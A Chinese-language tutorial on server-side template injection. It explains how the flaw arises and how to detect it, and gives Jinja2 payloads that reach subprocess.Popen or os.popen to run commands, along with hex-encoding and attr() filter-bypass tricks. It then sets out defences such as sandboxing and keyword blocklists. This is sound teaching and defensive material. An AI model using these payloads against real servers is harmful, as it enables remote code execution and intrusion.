服务器端模板注入（SSTI）漏洞与防护（实战进阶篇） 描述 服务器端模板注入（Server-Side Template Injection, SSTI）是一种发生在应用程序使用模板引擎动态生成页面内容时的安全漏洞。当攻击者能够将恶意模板语法注入到模板中，并被服务器端模板引擎解析执行时，就可能造成远程代码执行（RCE）、敏感信息泄露、文件系统访问等严重后果。本进阶篇聚焦于复杂上下文下的注入、自动化探测、绕过技术及深度防御策略。 解题与讲解过程 第一步：理解模板引擎的工作原理与漏洞根源 模板引擎的作用 ：模板引擎（如Jinja2, Twig, Freemarker, Velocity, Smarty, ERB）将静态模板文件与动态数据结合，生成最终的HTML、邮件等内容。开发者定义模板（包含静态部分和动态占位符），引擎将用户提供的数据填入占位符。 漏洞根源 ：漏洞产生于 将用户输入直接拼接（或未经安全处理就传递）到模板中 ，而非仅仅作为数据填充。关键区别在于： 安全情况 ：用户输入作为 {{ user_input }} 变量的值插入，引擎将其视为普通字符串数据。 危险情况 ：用户输入被拼接进模板的“代码”部分，如 {% include user_input %} 或 "Hello " + username （其中 username 被直接拼接进模板字符串）。引擎会解析并执行输入中的模板指令。 第二步：识别与探测SSTI漏洞 探测思路 ：在疑似接收动态内容的参数（如用户名、搜索词、评论、URL路径、文件名）中，插入模板语法的基本表达式。 通用探测载荷 ：可以尝试使用数学运算表达式。 对于类似 {{ 7*7 }} 的语法（Jinja2, Twig, Django模板等），观察响应是否包含 49 。 对于类似 ${7*7} 的语法（某些Java模板引擎），观察响应是否包含 49 。 对于类似 <%= 7*7 %> 的语法（ERB），观察响应是否包含 49 。 上下文识别 ： 纯文本上下文 ：输入 {{ 7*7 }} ，页面直接显示 {{ 7*7 }} ，说明输入被HTML转义或视为纯文本，可能安全。 代码上下文 ：输入 {{ 7*7 }} ，页面显示 49 ， 强烈暗示存在SSTI 。但需排除是客户端JavaScript计算的结果。 自动化与模糊测试 ：使用工具（如tplmap）或自定义脚本，系统性地向目标参数注入不同模板引擎的语法片段，通过响应差异识别引擎类型和可利用性。 第三步：利用SSTI漏洞（以Jinja2为例的进阶利用） 信息收集 ：确定模板引擎后，利用其内置对象和方法探查环境。 {{ config }} 或 {{ self }} 或 {{ request }} 尝试访问配置、当前模板对象或请求对象，可能泄露敏感信息。 {{ ''.__class__ }} 查看字符串对象的类，这是通往Python对象继承链的起点。 构建利用链 ：目标是执行任意代码。由于Jinja2沙盒限制，需要找到逃逸方法。 步骤1 - 获取基类 ： {{ ''.__class__ }} 返回 <class 'str'> 。 步骤2 - 获取继承链 ： {{ ''.__class__.__mro__ }} 或 {{ ''.__class__.__bases__ }} 获取基类元组，例如 (<class 'object'>,) 。 步骤3 - 获取子类列表 ： {{ ''.__class__.__mro__[1].__subclasses__() }} 获取 object 类的所有子类列表。这是一个庞大的列表，包含许多可利用的类。 寻找危险类并执行命令 ：在子类列表中寻找可执行命令的类，如 <class 'subprocess.Popen'> 。需要知道它在列表中的索引。 查找索引 ：可以编写脚本离线分析，或通过注入 {{ ''.__class__.__mro__[1].__subclasses__()[索引] }} 并观察响应来盲测（例如，返回 <class 'subprocess.Popen'> 的描述）。 假设找到索引为258 ： {{ ''.__class__.__mro__[1].__subclasses__()[258]('whoami', shell=True, stdout=-1).communicate() }} 这个载荷创建了 Popen 实例，执行 whoami 命令，并获取输出。 绕过过滤与黑名单 ： 字符串拼接 ： {{ (request|attr('application'))|attr('\x5f\x5fglobals\x5f\x5f') }} 使用十六进制或八进制编码绕过关键字过滤。 属性访问替代 ：用 .attr('方法名') 替代点号访问，如 {{ ''.__class__.__mro__[1].__subclasses__()|attr('__getitem__')(258) }} 。 使用 request 对象 ： {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }} 如果 request 对象可用。 模板内置过滤器/函数 ：某些引擎的过滤器如 map 、 reduce 、 join 可能被滥用构造Payload。 第四步：防护策略（深度防御） 根本方法：避免用户输入控制模板结构 绝不拼接用户输入 ：永远不要将用户可控数据直接拼接到模板字符串或模板指令中。 严格数据与代码分离 ：用户输入只应作为 数据 传递给模板渲染函数，通过模板引擎提供的安全变量插值语法（如 {{ variable }} ）进行渲染。确保变量内容在渲染前已被正确转义（但SSTI利用的是代码执行，而非XSS，转义对防护SSTI本身无效）。 使用沙盒环境与安全配置 ： 启用沙盒模式 ：许多模板引擎（如Jinja2的 sandboxed 环境）提供了沙盒功能，限制可访问的对象和方法。启用并严格配置。 移除或限制危险函数/类 ：在模板引擎配置中，禁止或从可用命名空间中移除危险的Python内置函数（如 __import__ , eval , exec ）和模块（ os , subprocess , sys ）。 使用无逻辑模板引擎 ：考虑使用类似Mustache这样的“无逻辑”模板引擎，它严格限制模板中的逻辑，从根本上减少了代码注入的可能性。 输入验证与净化 ： 严格的白名单验证 ：对进入模板渲染流程的数据，根据业务需求定义严格的白名单字符集（如仅字母、数字、特定符号）。但注意，SSTI载荷可能使用允许的字符构造，白名单需极其谨慎。 过滤危险关键字 ：虽然可被绕过，但作为一层防护，可以过滤如 __class__ 、 __mro__ 、 __subclasses__ 、 __globals__ 、 __builtins__ 、 os 、 eval 、 import 等关键字。但需结合其他方法。 代码审查与安全测试 ： 重点审查 ：在代码审查中，特别关注任何将用户输入传递给模板渲染函数的上下文，尤其是那些用于动态包含模板、宏名、过滤器名、模板文件路径的参数。 自动化DAST/IAST测试 ：在安全测试阶段，使用具备SSTI检测能力的动态应用安全测试（DAST）工具或交互式应用安全测试（IAST）工具进行扫描。 纵深防御 ： 最小权限运行 ：运行模板引擎的应用程序进程应遵循最小权限原则，避免使用root或高权限账户，限制其文件系统访问和网络访问能力。 及时更新 ：保持模板引擎库和相关依赖的最新版本，以修复已知的安全漏洞。 安全监控 ：在服务器日志和应用程序日志中监控异常的模板渲染错误，这些错误可能指示攻击尝试。设置告警机制。 总结 ：SSTI漏洞危害巨大，防护核心在于 严格分离代码与数据 ，确保用户输入永不进入模板的“代码”上下文中。结合输入验证、沙盒环境、安全配置和最小权限原则，构建纵深防御体系。在代码开发和审计过程中，对任何将用户输入与模板逻辑结合的操作保持高度警惕。